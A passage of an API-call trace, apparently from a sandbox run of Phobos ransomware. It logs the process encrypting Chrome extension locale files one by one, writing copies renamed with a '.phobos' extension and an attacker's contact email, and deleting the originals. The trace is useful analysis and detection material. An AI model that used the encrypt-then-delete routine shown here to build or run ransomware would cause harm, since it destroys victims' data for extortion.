SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.743] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.743] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.743] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.743] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.744] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.744] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.745] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0151.745] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.745] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.745] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.745] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.745] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.745] CloseHandle (hObject=0x138) returned 1 [0151.745] CloseHandle (hObject=0x130) returned 1 [0151.745] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json")) returned 1 [0151.746] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.746] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.746] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.746] CloseHandle (hObject=0x130) returned 1 [0151.746] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json")) returned 0x2020 [0151.747] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.747] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.747] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.747] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.747] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.747] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.747] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.747] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.748] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.748] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.749] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0151.749] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.749] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.749] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.749] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.749] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.749] CloseHandle (hObject=0x130) returned 1 [0151.749] CloseHandle (hObject=0x138) returned 1 [0151.749] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json")) returned 1 [0151.758] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.758] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.758] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.759] CloseHandle (hObject=0x138) returned 1 [0151.759] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json")) returned 0x2020 [0151.759] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.759] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.759] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.759] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.759] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.759] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.759] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.759] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.760] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.760] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.761] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0151.761] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.761] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.761] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.761] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.761] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.761] CloseHandle (hObject=0x138) returned 1 [0151.761] CloseHandle (hObject=0x130) returned 1 [0151.761] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json")) returned 1 [0151.762] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.763] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.763] CloseHandle (hObject=0x130) returned 1 [0151.763] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json")) returned 0x2020 [0151.763] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.763] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.763] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.763] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.763] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.763] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.764] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.764] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.765] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0151.765] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.765] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.765] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.765] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.765] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.765] CloseHandle (hObject=0x130) returned 1 [0151.766] CloseHandle (hObject=0x138) returned 1 [0151.766] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json")) returned 1 [0151.766] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.767] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.767] CloseHandle (hObject=0x138) returned 1 [0151.767] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json")) returned 0x2020 [0151.767] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.767] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.767] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.767] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.768] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.768] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.768] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.768] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, 